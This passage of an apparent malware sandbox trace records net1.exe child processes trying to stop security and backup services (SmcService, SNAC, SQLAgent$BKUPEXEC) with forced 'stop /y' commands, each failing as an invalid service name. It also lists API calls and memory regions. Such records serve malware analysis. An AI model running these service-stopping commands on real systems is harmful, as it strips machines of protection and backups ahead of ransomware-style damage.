_String2="SmcService") returned -8 [0113.859] _wcsicmp (_String1="sessions", _String2="SmcService") returned -8 [0113.859] _wcsicmp (_String1="sess", _String2="SmcService") returned -8 [0113.859] _wcsicmp (_String1="share", _String2="SmcService") returned -5 [0113.859] _wcsicmp (_String1="start", _String2="SmcService") returned 7 [0113.860] _wcsicmp (_String1="stats", _String2="SmcService") returned 7 [0113.860] _wcsicmp (_String1="statistics", _String2="SmcService") returned 7 [0113.860] _wcsicmp (_String1="stop", _String2="SmcService") returned 7 [0113.860] _wcsicmp (_String1="time", _String2="SmcService") returned 1 [0113.860] _wcsicmp (_String1="user", _String2="SmcService") returned 2 [0113.860] _wcsicmp (_String1="users", _String2="SmcService") returned 2 [0113.860] _wcsicmp (_String1="msg", _String2="SmcService") returned -6 [0113.860] _wcsicmp (_String1="messenger", _String2="SmcService") returned -6 [0113.860] _wcsicmp (_String1="receiver", _String2="SmcService") returned -1 [0113.860] _wcsicmp (_String1="rcv", _String2="SmcService") returned -1 [0113.860] _wcsicmp (_String1="netpopup", _String2="SmcService") returned -5 [0113.860] _wcsicmp (_String1="redirector", _String2="SmcService") returned -1 [0113.860] _wcsicmp (_String1="redir", _String2="SmcService") returned -1 [0113.860] _wcsicmp (_String1="rdr", _String2="SmcService") returned -1 [0113.860] _wcsicmp (_String1="workstation", _String2="SmcService") returned 4 [0113.860] _wcsicmp (_String1="work", _String2="SmcService") returned 4 [0113.860] _wcsicmp (_String1="wksta", _String2="SmcService") returned 4 [0113.860] _wcsicmp (_String1="prdr", _String2="SmcService") returned -3 [0113.860] _wcsicmp (_String1="devrdr", _String2="SmcService") returned -15 [0113.860] _wcsicmp (_String1="lanmanworkstation", _String2="SmcService") returned -7 [0113.860] _wcsicmp (_String1="server", _String2="SmcService") returned -8 [0113.860] _wcsicmp (_String1="svr", _String2="SmcService") returned 9 [0113.860] _wcsicmp (_String1="srv", _String2="SmcService") returned 5 [0113.860] _wcsicmp (_String1="lanmanserver", _String2="SmcService") returned -7 [0113.860] _wcsicmp (_String1="alerter", _String2="SmcService") returned -18 [0113.860] _wcsicmp (_String1="netlogon", _String2="SmcService") returned -5 [0113.861] _wcsupr (in: _String="SmcService" | out: _String="SMCSERVICE") returned="SMCSERVICE" [0113.861] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x24ce00 [0113.865] GetServiceKeyNameW (in: hSCManager=0x24ce00, lpDisplayName="SMCSERVICE", lpServiceName=0xff3f5750, lpcchBuffer=0x12f628 | out: lpServiceName="", lpcchBuffer=0x12f628) returned 0 [0113.868] _wcsicmp (_String1="msg", _String2="SMCSERVICE") returned -6 [0113.868] _wcsicmp (_String1="messenger", _String2="SMCSERVICE") returned -6 [0113.868] _wcsicmp (_String1="receiver", _String2="SMCSERVICE") returned -1 [0113.868] _wcsicmp (_String1="rcv", _String2="SMCSERVICE") returned -1 [0113.868] _wcsicmp (_String1="redirector", _String2="SMCSERVICE") returned -1 [0113.868] _wcsicmp (_String1="redir", _String2="SMCSERVICE") returned -1 [0113.868] _wcsicmp (_String1="rdr", _String2="SMCSERVICE") returned -1 [0113.868] _wcsicmp (_String1="workstation", _String2="SMCSERVICE") returned 4 [0113.868] _wcsicmp (_String1="work", _String2="SMCSERVICE") returned 4 [0113.868] _wcsicmp (_String1="wksta", _String2="SMCSERVICE") returned 4 [0113.868] _wcsicmp (_String1="prdr", _String2="SMCSERVICE") returned -3 [0113.868] _wcsicmp (_String1="devrdr", _String2="SMCSERVICE") returned -15 [0113.868] _wcsicmp (_String1="lanmanworkstation", _String2="SMCSERVICE") returned -7 [0113.868] _wcsicmp (_String1="server", _String2="SMCSERVICE") returned -8 [0113.868] _wcsicmp (_String1="svr", _String2="SMCSERVICE") returned 9 [0113.868] _wcsicmp (_String1="srv", _String2="SMCSERVICE") returned 5 [0113.868] _wcsicmp (_String1="lanmanserver", _String2="SMCSERVICE") returned -7 [0113.868] _wcsicmp (_String1="alerter", _String2="SMCSERVICE") returned -18 [0113.868] _wcsicmp (_String1="netlogon", _String2="SMCSERVICE") returned -5 [0113.869] NetServiceControl (in: servername=0x0, service="SMCSERVICE", opcode=0x0, arg=0x0, bufptr=0x12f630 | out: bufptr=0x12f630) returned 0x889 [0113.869] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.869] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0113.870] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.872] GetFileType (hFile=0xb) returned 0x2 [0113.872] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f4f8 | out: lpMode=0x12f4f8) returned 1 [0113.872] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f4f0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x12f4f0*=0x1e) returned 1 [0113.873] GetFileType (hFile=0xb) returned 0x2 [0113.873] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f4f8 | out: lpMode=0x12f4f8) returned 1 [0113.873] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f4f0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x12f4f0*=0x2) returned 1 [0113.873] _ultow (in: _Dest=0x889, _Radix=1242464 | out: _Dest=0x889) returned="2185" [0113.873] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.874] GetFileType (hFile=0xb) returned 0x2 [0113.874] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f4f8 | out: lpMode=0x12f4f8) returned 1 [0113.874] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f4f0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x12f4f0*=0x34) returned 1 [0113.874] GetFileType (hFile=0xb) returned 0x2 [0113.875] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f4f8 | out: lpMode=0x12f4f8) returned 1 [0113.875] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f4f0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x12f4f0*=0x2) returned 1 [0113.875] NetApiBufferFree (Buffer=0x244d50) returned 0x0 [0113.875] NetApiBufferFree (Buffer=0x24c0f0) returned 0x0 [0113.875] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SmcService /y" [0113.875] exit (_Code=2) Process: id = "302" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5310d000" os_pid = "0x9e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "266" os_parent_pid = "0xe74" cmd_line = "C:\\Windows\\system32\\net1 stop SNAC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10873 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10874 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10875 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10876 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10877 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10878 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10879 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10880 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10881 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10882 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10883 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10884 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10885 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10886 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10887 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10970 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10971 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10972 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10973 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10974 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 10975 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10976 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10977 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10978 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10979 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10980 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10981 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10982 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10983 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10984 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10985 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10986 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10987 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10988 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10989 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10990 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10991 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10992 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10993 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 804 os_tid = 0x12e0 [0113.879] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcb0 | out: lpSystemTimeAsFileTime=0x1cfcb0*(dwLowDateTime=0xf90876b0, dwHighDateTime=0x1d48689)) [0113.879] GetCurrentProcessId () returned 0x9e4 [0113.879] GetCurrentThreadId () returned 0x12e0 [0113.879] GetTickCount () returned 0x262a8 [0113.879] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcb8 | out: lpPerformanceCount=0x1cfcb8*=1816079700000) returned 1 [0113.881] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.881] __set_app_type (_Type=0x1) [0113.881] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.881] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.881] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.881] GetConsoleOutputCP () returned 0x1b5 [0113.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.882] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.884] sprintf_s (in: _DstBuf=0x1cfc58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.884] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.886] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.886] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SNAC /y" [0113.886] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf9f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.886] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.886] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc48 | out: Buffer=0x1cfc48*=0x2b4d40) returned 0x0 [0113.886] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc48 | out: Buffer=0x1cfc48*=0x2bc0e0) returned 0x0 [0113.886] _fileno (_File=0x7fefdba2a80) returned 0 [0113.886] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.886] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.887] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.887] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.887] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.887] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.887] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.887] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.887] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.887] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.887] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.887] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.887] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.887] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.887] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.887] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.887] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.887] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.887] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.887] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.887] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.887] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.887] _wcsicmp (_String1="accounts", _String2="SNAC") returned -18 [0113.887] _wcsicmp (_String1="computer", _String2="SNAC") returned -16 [0113.887] _wcsicmp (_String1="config", _String2="SNAC") returned -16 [0113.887] _wcsicmp (_String1="continue", _String2="SNAC") returned -16 [0113.887] _wcsicmp (_String1="cont", _String2="SNAC") returned -16 [0113.887] _wcsicmp (_String1="file", _String2="SNAC") returned -13 [0113.887] _wcsicmp (_String1="files", _String2="SNAC") returned -13 [0113.887] _wcsicmp (_String1="group", _String2="SNAC") returned -12 [0113.887] _wcsicmp (_String1="groups", _String2="SNAC") returned -12 [0113.887] _wcsicmp (_String1="help", _String2="SNAC") returned -11 [0113.887] _wcsicmp (_String1="helpmsg", _String2="SNAC") returned -11 [0113.888] _wcsicmp (_String1="localgroup", _String2="SNAC") returned -7 [0113.888] _wcsicmp (_String1="pause", _String2="SNAC") returned -3 [0113.888] _wcsicmp (_String1="session", _String2="SNAC") returned -9 [0113.888] _wcsicmp (_String1="sessions", _String2="SNAC") returned -9 [0113.888] _wcsicmp (_String1="sess", _String2="SNAC") returned -9 [0113.888] _wcsicmp (_String1="share", _String2="SNAC") returned -6 [0113.888] _wcsicmp (_String1="start", _String2="SNAC") returned 6 [0113.888] _wcsicmp (_String1="stats", _String2="SNAC") returned 6 [0113.888] _wcsicmp (_String1="statistics", _String2="SNAC") returned 6 [0113.888] _wcsicmp (_String1="stop", _String2="SNAC") returned 6 [0113.888] _wcsicmp (_String1="time", _String2="SNAC") returned 1 [0113.888] _wcsicmp (_String1="user", _String2="SNAC") returned 2 [0113.888] _wcsicmp (_String1="users", _String2="SNAC") returned 2 [0113.888] _wcsicmp (_String1="msg", _String2="SNAC") returned -6 [0113.888] _wcsicmp (_String1="messenger", _String2="SNAC") returned -6 [0113.888] _wcsicmp (_String1="receiver", _String2="SNAC") returned -1 [0113.888] _wcsicmp (_String1="rcv", _String2="SNAC") returned -1 [0113.888] _wcsicmp (_String1="netpopup", _String2="SNAC") returned -5 [0113.888] _wcsicmp (_String1="redirector", _String2="SNAC") returned -1 [0113.888] _wcsicmp (_String1="redir", _String2="SNAC") returned -1 [0113.888] _wcsicmp (_String1="rdr", _String2="SNAC") returned -1 [0113.888] _wcsicmp (_String1="workstation", _String2="SNAC") returned 4 [0113.888] _wcsicmp (_String1="work", _String2="SNAC") returned 4 [0113.888] _wcsicmp (_String1="wksta", _String2="SNAC") returned 4 [0113.888] _wcsicmp (_String1="prdr", _String2="SNAC") returned -3 [0113.888] _wcsicmp (_String1="devrdr", _String2="SNAC") returned -15 [0113.888] _wcsicmp (_String1="lanmanworkstation", _String2="SNAC") returned -7 [0113.888] _wcsicmp (_String1="server", _String2="SNAC") returned -9 [0113.888] _wcsicmp (_String1="svr", _String2="SNAC") returned 8 [0113.888] _wcsicmp (_String1="srv", _String2="SNAC") returned 4 [0113.888] _wcsicmp (_String1="lanmanserver", _String2="SNAC") returned -7 [0113.888] _wcsicmp (_String1="alerter", _String2="SNAC") returned -18 [0113.888] _wcsicmp (_String1="netlogon", _String2="SNAC") returned -5 [0113.889] _wcsupr (in: _String="SNAC" | out: _String="SNAC") returned="SNAC" [0113.889] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2bc900 [0113.893] GetServiceKeyNameW (in: hSCManager=0x2bc900, lpDisplayName="SNAC", lpServiceName=0xff3f5750, lpcchBuffer=0x1cfb68 | out: lpServiceName="", lpcchBuffer=0x1cfb68) returned 0 [0113.894] _wcsicmp (_String1="msg", _String2="SNAC") returned -6 [0113.894] _wcsicmp (_String1="messenger", _String2="SNAC") returned -6 [0113.894] _wcsicmp (_String1="receiver", _String2="SNAC") returned -1 [0113.895] _wcsicmp (_String1="rcv", _String2="SNAC") returned -1 [0113.895] _wcsicmp (_String1="redirector", _String2="SNAC") returned -1 [0113.895] _wcsicmp (_String1="redir", _String2="SNAC") returned -1 [0113.895] _wcsicmp (_String1="rdr", _String2="SNAC") returned -1 [0113.895] _wcsicmp (_String1="workstation", _String2="SNAC") returned 4 [0113.895] _wcsicmp (_String1="work", _String2="SNAC") returned 4 [0113.895] _wcsicmp (_String1="wksta", _String2="SNAC") returned 4 [0113.895] _wcsicmp (_String1="prdr", _String2="SNAC") returned -3 [0113.895] _wcsicmp (_String1="devrdr", _String2="SNAC") returned -15 [0113.895] _wcsicmp (_String1="lanmanworkstation", _String2="SNAC") returned -7 [0113.895] _wcsicmp (_String1="server", _String2="SNAC") returned -9 [0113.895] _wcsicmp (_String1="svr", _String2="SNAC") returned 8 [0113.895] _wcsicmp (_String1="srv", _String2="SNAC") returned 4 [0113.895] _wcsicmp (_String1="lanmanserver", _String2="SNAC") returned -7 [0113.895] _wcsicmp (_String1="alerter", _String2="SNAC") returned -18 [0113.895] _wcsicmp (_String1="netlogon", _String2="SNAC") returned -5 [0113.895] NetServiceControl (in: servername=0x0, service="SNAC", opcode=0x0, arg=0x0, bufptr=0x1cfb70 | out: bufptr=0x1cfb70) returned 0x889 [0113.896] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.896] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0113.897] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.898] GetFileType (hFile=0xb) returned 0x2 [0113.898] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0113.899] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x1cfa30*=0x1e) returned 1 [0113.899] GetFileType (hFile=0xb) returned 0x2 [0113.899] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0113.899] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x1cfa30*=0x2) returned 1 [0113.900] _ultow (in: _Dest=0x889, _Radix=1899168 | out: _Dest=0x889) returned="2185" [0113.900] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.900] GetFileType (hFile=0xb) returned 0x2 [0113.900] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0113.901] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x1cfa30*=0x34) returned 1 [0113.901] GetFileType (hFile=0xb) returned 0x2 [0113.901] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0113.901] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x1cfa30*=0x2) returned 1 [0113.902] NetApiBufferFree (Buffer=0x2b4d40) returned 0x0 [0113.902] NetApiBufferFree (Buffer=0x2bc0e0) returned 0x0 [0113.902] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SNAC /y" [0113.902] exit (_Code=2) Process: id = "303" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x692fa000" os_pid = "0x1324" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "269" os_parent_pid = "0xc9c" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10888 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10889 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10890 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 10891 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10892 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10893 start_va = 